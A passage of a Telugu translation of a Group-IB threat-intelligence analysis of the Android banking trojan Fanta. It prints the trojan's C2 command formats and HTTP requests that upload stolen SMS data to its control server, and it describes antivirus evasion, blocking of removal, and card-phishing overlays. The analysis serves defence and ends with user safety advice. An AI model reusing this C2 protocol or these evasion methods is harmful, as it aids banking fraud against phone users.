    ఆదేశంపై ఆధారపడి, సర్వర్ వివిధ పారామితులతో JSON ఆబ్జెక్ట్‌ను తిరిగి ఇవ్వగలదు:

    · జట్టు SMS సందేశాన్ని పంపండి: పారామితులు ఫోన్ నంబర్, SMS సందేశం యొక్క వచనం మరియు పంపబడుతున్న సందేశం యొక్క IDని కలిగి ఉంటాయి. రకంతో సర్వర్‌కు సందేశాన్ని పంపేటప్పుడు ఐడెంటిఫైయర్ ఉపయోగించబడుతుంది setSmsStatus.

    {
        "response":
        [
       	 {
       		 "mode": 0,
       		 "sms_number": <%SMS_NUMBER%>,
       		 "sms_text": <%SMS_TEXT%>,
       		 "sms_id": %SMS_ID%
       	 }
        ],
        "status":"ok"
    }

    · జట్టు ఫోన్ కాల్ లేదా USSD కమాండ్ చేయండి: ఫోన్ నంబర్ లేదా కమాండ్ రెస్పాన్స్ బాడీలో వస్తుంది.

    {
        "response":
        [
       	 {
       		 "mode": 1,
       		 "command": <%TEL_NUMBER%>
       	 }
        ],
        "status":"ok"
    }

    · జట్టు విరామం పరామితిని మార్చండి.

    {
        "response":
        [
       	 {
       		 "mode": 2,
       		 "interval": <%SECONDS%>
       	 }
        ],
        "status":"ok"
    }

    · జట్టు ఇంటర్‌సెప్ట్ పరామితిని మార్చండి.

    {
        "response":
        [
       	 {
       		 "mode": 3,
       		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
       	 }
        ],
        "status":"ok"
    }

    · జట్టు SmsManager ఫీల్డ్‌ని మార్చండి.

    {
        "response":
        [
       	 {
       		 "mode": 6,
       		 "enable": 0/1
       	 }
        ],
        "status":"ok"
    }

    · జట్టు సోకిన పరికరం నుండి SMS సందేశాలను సేకరించండి.

    {
        "response":
        [
       	 {
       		 "mode": 9
       	 }
        ],
        "status":"ok"
    }

    · జట్టు మీ ఫోన్‌ని ఫ్యాక్టరీ సెట్టింగ్‌లకు రీసెట్ చేయండి:

    {
        "response":
        [
       	 {
       		 "mode": 11
       	 }
        ],
        "status":"ok"
    }

    · జట్టు ReadDialog పరామితిని మార్చండి.

    {
        "response":
        [
       	 {
       		 "mode": 12,
       		 "enable": 0/1
       	 }
        ],
        "status":"ok"
    }

  • రకంతో సందేశాన్ని పంపుతోంది setSmsStatus. ఆదేశం అమలు చేయబడిన తర్వాత ఈ అభ్యర్థన చేయబడుతుంది SMS సందేశాన్ని పంపండి. అభ్యర్థన ఇలా కనిపిస్తుంది:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • డేటాబేస్ కంటెంట్‌లను అప్‌లోడ్ చేస్తోంది. ఒక అభ్యర్థనకు ఒక అడ్డు వరుస ప్రసారం చేయబడుతుంది. కింది డేటా సర్వర్‌కు పంపబడుతుంది:
    · కుకీ - సర్వర్ నుండి అందుకున్న కుక్కీలు
    · మోడ్ - స్ట్రింగ్ స్థిరాంకం setSaveInboxSms
    · బిడ్ - అభ్యర్థనను పంపుతున్నప్పుడు స్వీకరించబడిన సోకిన పరికరం యొక్క id రిజిస్టర్_బోట్
    · టెక్స్ట్ — ప్రస్తుత డేటాబేస్ రికార్డులో వచనం (ఫీల్డ్ d టేబుల్ నుండి చిట్టాలు డేటాబేస్లో а)
    · సంఖ్య — ప్రస్తుత డేటాబేస్ రికార్డు పేరు (ఫీల్డ్ p టేబుల్ నుండి చిట్టాలు డేటాబేస్లో а)
    · sms_మోడ్ — పూర్ణాంకం విలువ (ఫీల్డ్ m టేబుల్ నుండి చిట్టాలు డేటాబేస్లో а)

    అభ్యర్థన ఇలా కనిపిస్తుంది:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    సర్వర్‌కు విజయవంతంగా పంపబడితే, పట్టిక నుండి అడ్డు వరుస తొలగించబడుతుంది. సర్వర్ ద్వారా అందించబడిన JSON వస్తువు యొక్క ఉదాహరణ:

    {
        "response":[],
        "status":"ok"
    }

యాక్సెసిబిలిటీ సర్వీస్‌తో ఇంటరాక్ట్ అవుతోంది

వైకల్యాలున్న వ్యక్తుల కోసం Android పరికరాలను సులభంగా ఉపయోగించడానికి యాక్సెసిబిలిటీ సర్వీస్ అమలు చేయబడింది. చాలా సందర్భాలలో, అప్లికేషన్‌తో పరస్పర చర్య చేయడానికి భౌతిక పరస్పర చర్య అవసరం. యాక్సెసిబిలిటీ సర్వీస్ వాటిని ప్రోగ్రామాటిక్‌గా చేయడానికి మిమ్మల్ని అనుమతిస్తుంది. బ్యాంకింగ్ అప్లికేషన్‌లలో నకిలీ విండోలను సృష్టించడానికి మరియు సిస్టమ్ సెట్టింగ్‌లు మరియు కొన్ని అప్లికేషన్‌లను తెరవకుండా వినియోగదారులను నిరోధించడానికి ఫాంటా సేవను ఉపయోగిస్తుంది.

యాక్సెసిబిలిటీ సర్వీస్ యొక్క కార్యాచరణను ఉపయోగించి, ట్రోజన్ సోకిన పరికరం యొక్క స్క్రీన్‌పై మూలకాలకు మార్పులను పర్యవేక్షిస్తుంది. మునుపు వివరించినట్లుగా, ఫాంటా సెట్టింగ్‌లు డైలాగ్ బాక్స్‌లతో కార్యకలాపాలను లాగింగ్ చేయడానికి బాధ్యత వహించే పరామితిని కలిగి ఉంటాయి - డైలాగ్ చదవండి. ఈ పరామితి సెట్ చేయబడితే, ఈవెంట్‌ను ప్రేరేపించిన ప్యాకేజీ పేరు మరియు వివరణ గురించిన సమాచారం డేటాబేస్‌కు జోడించబడుతుంది. ఈవెంట్‌లు ప్రేరేపించబడినప్పుడు ట్రోజన్ క్రింది చర్యలను చేస్తుంది:

  • కింది సందర్భాలలో వెనుక మరియు హోమ్ కీలను నొక్కడాన్ని అనుకరిస్తుంది:
    · వినియోగదారు తన పరికరాన్ని రీబూట్ చేయాలనుకుంటే
    · వినియోగదారు "Avito" అప్లికేషన్‌ను తొలగించాలనుకుంటే లేదా యాక్సెస్ హక్కులను మార్చాలనుకుంటే
    · పేజీలో "Avito" అప్లికేషన్ యొక్క ప్రస్తావన ఉంటే
    · Google Play Protect అప్లికేషన్‌ను తెరిచేటప్పుడు
    · యాక్సెసిబిలిటీ సర్వీస్ సెట్టింగ్‌లతో పేజీలను తెరిచేటప్పుడు
    · సిస్టమ్ సెక్యూరిటీ డైలాగ్ బాక్స్ కనిపించినప్పుడు
    · "ఇతర యాప్‌పై గీయండి" సెట్టింగ్‌లతో పేజీని తెరిచేటప్పుడు
    · “అప్లికేషన్స్” పేజీని తెరిచేటప్పుడు, “రికవరీ మరియు రీసెట్”, “డేటా రీసెట్”, “సెట్టింగ్‌లను రీసెట్ చేయండి”, “డెవలపర్ ప్యానెల్”, “స్పెషల్. అవకాశాలు", "ప్రత్యేక అవకాశాలు", "ప్రత్యేక హక్కులు"
    · ఈవెంట్ నిర్దిష్ట అప్లికేషన్‌ల ద్వారా సృష్టించబడినట్లయితే.

    అప్లికేషన్ జాబితా

    • యాండ్రాయిడ్
    • మాస్టర్ లైట్
    • క్లీన్ మాస్టర్
    • x86 CPU కోసం క్లీన్ మాస్టర్
    • Meizu అప్లికేషన్ అనుమతి నిర్వహణ
    • MIUI సెక్యూరిటీ
    • క్లీన్ మాస్టర్ - యాంటీవైరస్ & కాష్ మరియు గార్బేజ్ క్లీనర్
    • తల్లిదండ్రుల నియంత్రణలు మరియు GPS: Kaspersky SafeKids
    • కాస్పెర్స్కీ యాంటీవైరస్ యాప్‌లాక్ & వెబ్ సెక్యూరిటీ బీటా
    • వైరస్ క్లీనర్, యాంటీవైరస్, క్లీనర్ (MAX సెక్యూరిటీ)
    • మొబైల్ యాంటీవైరస్ సెక్యూరిటీ PRO
    • అవాస్ట్ యాంటీవైరస్ & ఉచిత రక్షణ 2019
    • మొబైల్ సెక్యూరిటీ MegaFon
    • Xperia కోసం AVG రక్షణ
    • మొబైల్ భద్రత
    • మాల్వేర్బైట్స్ యాంటీవైరస్ & రక్షణ
    • Android 2019 కోసం యాంటీవైరస్
    • సెక్యూరిటీ మాస్టర్ - యాంటీవైరస్, VPN, AppLock, Booster
    • Huawei టాబ్లెట్ సిస్టమ్ మేనేజర్ కోసం AVG యాంటీవైరస్
    • Samsung యాక్సెసిబిలిటీ
    • Samsung స్మార్ట్ మేనేజర్
    • సెక్యూరిటీ మాస్టర్
    • స్పీడ్ బూస్టర్
    • డా.వెబ్
    • డా.వెబ్ సెక్యూరిటీ స్పేస్
    • డా.వెబ్ మొబైల్ కంట్రోల్ సెంటర్
    • డా.వెబ్ సెక్యూరిటీ స్పేస్ లైఫ్
    • డా.వెబ్ మొబైల్ కంట్రోల్ సెంటర్
    • యాంటీవైరస్ & మొబైల్ సెక్యూరిటీ
    • కాస్పెర్స్కీ ఇంటర్నెట్ భద్రత: యాంటీవైరస్ మరియు రక్షణ
    • కాస్పెర్స్కీ బ్యాటరీ లైఫ్: సేవర్ & బూస్టర్
    • కాస్పెర్స్కీ ఎండ్‌పాయింట్ సెక్యూరిటీ - రక్షణ మరియు నిర్వహణ
    • AVG యాంటీవైరస్ ఉచిత 2019 - Android కోసం రక్షణ
    • యాంటీవైరస్ Android
    • నార్టన్ మొబైల్ సెక్యూరిటీ మరియు యాంటీవైరస్
    • యాంటీవైరస్, ఫైర్‌వాల్, VPN, మొబైల్ సెక్యూరిటీ
    • మొబైల్ భద్రత: యాంటీవైరస్, VPN, దొంగతనం రక్షణ
    • Android కోసం యాంటీవైరస్

  • చిన్న నంబర్‌కు SMS సందేశాన్ని పంపేటప్పుడు అనుమతి అభ్యర్థించబడితే, ఫాంటా చెక్‌బాక్స్‌పై క్లిక్ చేయడాన్ని అనుకరిస్తుంది ఎంపిక గుర్తుంచుకోండి మరియు బటన్ పంపు.
  • మీరు ట్రోజన్ నుండి అడ్మినిస్ట్రేటర్ హక్కులను తీసివేయడానికి ప్రయత్నించినప్పుడు, అది ఫోన్ స్క్రీన్‌ను లాక్ చేస్తుంది.
  • కొత్త నిర్వాహకులను జోడించడాన్ని నిరోధిస్తుంది.
  • యాంటీవైరస్ అప్లికేషన్ ఉంటే dr.web ముప్పును గుర్తించింది, ఫాంటా బటన్‌ను నొక్కడం అనుకరిస్తుంది పట్టించుకోకుండా.
  • అప్లికేషన్ ద్వారా ఈవెంట్ రూపొందించబడితే, ట్రోజన్ బ్యాక్ మరియు హోమ్ బటన్‌ను నొక్కడాన్ని అనుకరిస్తుంది శామ్సంగ్ పరికర సంరక్షణ.
  • దాదాపు 30 రకాల ఇంటర్నెట్ సేవల జాబితా నుండి అప్లికేషన్ ప్రారంభించబడితే, బ్యాంక్ కార్డ్‌ల గురించిన సమాచారాన్ని నమోదు చేయడానికి ఫాంటా ఫారమ్‌లతో ఫిషింగ్ విండోలను సృష్టిస్తుంది. వాటిలో: AliExpress, బుకింగ్, Avito, Google Play Market Component, Pandao, Drom Auto, మొదలైనవి.

    ఫిషింగ్ రూపాలు

    సోకిన పరికరంలో ఏయే అప్లికేషన్లు రన్ అవుతున్నాయో ఫాంటా విశ్లేషిస్తుంది. ఆసక్తి ఉన్న అప్లికేషన్ తెరవబడితే, ట్రోజన్ అన్ని ఇతర వాటి పైన ఫిషింగ్ విండోను ప్రదర్శిస్తుంది, ఇది బ్యాంక్ కార్డ్ సమాచారాన్ని నమోదు చేయడానికి ఒక ఫారమ్. వినియోగదారు తప్పనిసరిగా కింది డేటాను నమోదు చేయాలి:

    • కార్డ్ నంబర్
    • కార్డ్ గడువు తేదీ
    • CVV
    • కార్డ్ హోల్డర్ పేరు (అన్ని బ్యాంకులకు కాదు)

    అమలవుతున్న అప్లికేషన్‌పై ఆధారపడి, వివిధ ఫిషింగ్ విండోలు చూపబడతాయి. వాటిలో కొన్ని ఉదాహరణలు క్రింద ఉన్నాయి:

    AliExpress:

    Leisya, Fanta: పాత Android ట్రోజన్ యొక్క కొత్త వ్యూహాలు
    అవిటో:

    Leisya, Fanta: పాత Android ట్రోజన్ యొక్క కొత్త వ్యూహాలు
    కొన్ని ఇతర అనువర్తనాల కోసం, ఉదా. Google Play Market, Aviasales, Pandao, బుకింగ్, Trivago:
    Leisya, Fanta: పాత Android ట్రోజన్ యొక్క కొత్త వ్యూహాలు

    ఇది నిజంగా ఎలా ఉంది

    అదృష్టవశాత్తూ, వ్యాసం ప్రారంభంలో వివరించిన SMS సందేశాన్ని అందుకున్న వ్యక్తి సైబర్‌ సెక్యూరిటీ స్పెషలిస్ట్‌గా మారారు. అందువల్ల, అసలు, నాన్-డైరెక్టర్ వెర్షన్ ఇంతకు ముందు చెప్పిన దానికంటే భిన్నంగా ఉంటుంది: ఒక వ్యక్తి ఒక ఆసక్తికరమైన SMSని అందుకున్నాడు, ఆ తర్వాత అతను దానిని గ్రూప్-IB థ్రెట్ హంటింగ్ ఇంటెలిజెన్స్ బృందానికి ఇచ్చాడు. దాడి ఫలితమే ఈ కథనం. హ్యాపీ ఎండింగ్, సరియైనదా? అయినప్పటికీ, అన్ని కథలు అంత విజయవంతంగా ముగియవు మరియు మీది డబ్బు నష్టంతో దర్శకుడి కట్ లాగా కనిపించదు, చాలా సందర్భాలలో ఈ క్రింది దీర్ఘకాలంగా వివరించిన నియమాలకు కట్టుబడి ఉంటే సరిపోతుంది:

    • Google Play కాకుండా ఇతర మూలాల నుండి Android OSతో మొబైల్ పరికరం కోసం అప్లికేషన్‌లను ఇన్‌స్టాల్ చేయవద్దు
    • అప్లికేషన్‌ను ఇన్‌స్టాల్ చేస్తున్నప్పుడు, అప్లికేషన్ అభ్యర్థించిన హక్కులపై ప్రత్యేక శ్రద్ధ వహించండి
    • డౌన్‌లోడ్ చేసిన ఫైల్‌ల పొడిగింపులపై శ్రద్ధ వహించండి
    • క్రమం తప్పకుండా Android OS అప్‌డేట్‌లను ఇన్‌స్టాల్ చేయండి
    • అనుమానాస్పద వనరులను సందర్శించవద్దు మరియు అక్కడ నుండి ఫైల్‌లను డౌన్‌లోడ్ చేయవద్దు
    • SMS సందేశాలలో వచ్చిన లింక్‌లపై క్లిక్ చేయవద్దు.

మూలం: www.habr.com

ఒక వ్యాఖ్యను జోడించండి